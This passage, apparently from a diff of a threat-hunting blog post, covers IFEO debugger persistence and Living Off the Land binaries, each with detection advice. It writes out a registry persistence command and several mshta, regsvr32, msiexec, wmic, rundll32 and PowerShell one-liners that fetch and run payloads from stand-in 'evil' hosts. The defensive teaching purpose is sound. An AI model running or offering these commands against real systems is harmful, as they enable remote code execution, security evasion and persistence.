Th1ru-M/th1ru-m.github.io/_posts/2024-12-8-WindowsThreatHunting-Part1.md

 - Command execution and arguments passed to HH.exe using EDR solutions.
 - Suspicious process under the parent process HH.exe
 - Look for Windows event id 4688 and search this utility name as a keyword

+### **<u>Abusing Image File Execution Option</u>**

+Image File Execution Options (IFEO) are used for debugging.
+IFEO settings are stored in the Windows registry.
+This feature enables the developer to to attach a debugger to the known executables.
+Malwares can exploit this feature for its persistence.
+For example  by adding a debugger to the  known applications like calc.exe to execute malicious file named evil.exe, whenever the user opens calc.exe, evil.exe will be executed.

+`REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe" /v Debugger /d "C:/evil.exe"`

+<u>Detection:</u>
+  - Sweep all the executables under below mentioned registry path of Image File Execution Options and look for "debugger" key name.

+`HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options`

+### **<u>Living of the Land techniques - Security Evasion</u>**

+Living Off the Land techniques for exploitation are popular among both sophisticated and ecrime adversaries.
+Adversaries predominantly may use below windows utilities to download any executables and bypass proxy  or application whitelisting solutions.
+These techniques reduces the likelihood of detection and may increase the required investigation time.

+Windows Utilities:
+- certutil
+- Regsvr32
+- MSHTA
+- Powershell
+- msiexec
+- wmic
+- rundll32.exe

+Usage :
+- mshta.exe https[:]//evil/evil[.]hta
+- mshta evil[.]hta
+- regSvr32 /s /n /u /i:http[:]//evil.php/evil.sct scrobj.dll
+- MSIEXEC /j m evil[.]msi
+- msiexec /q /i http[:]//evil/evil[.]msi
+- wmic os get /FORMAT:"http://evil/evil[.]xsl"
+- rundll3.exe \\evil\evil.dll,0
+- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop
+ -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://evil/evil.sct');" rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject
+    ("script:https[:]//www[.]example[.]com/malicious.sct")"
+- Using Powershell:Invoke-WebRequest -Uri $url -OutFile $output
+- Using Powershell:(New-Object System.Net.WebClient).DownloadFile($url, $output)
+- Using Powershell:Start-BitsTransfer -Source $url -Destination $output -Asynchronous

+<u>Detection:</u>
+- Look for these utilities prefetch files and Parsing the prefetch will provide the executed file
+- Command execution and arguments passed to these utilities using EDR solutions
+- Look for the HTTP useragents with regsvr32,mshta,certuril in the network recorders or the proxy logs, Certutil, Windows Installer,
+Powershell-Mozilla/5.0 (Windows NT; Windows NT 6.3; en-US) WindowsPowerShell/4.0
+- Look for suspicious process in the system with parent process as these utilities.
+- Look for event id 4688 and its process command argument to track these exceutable with the above syntax.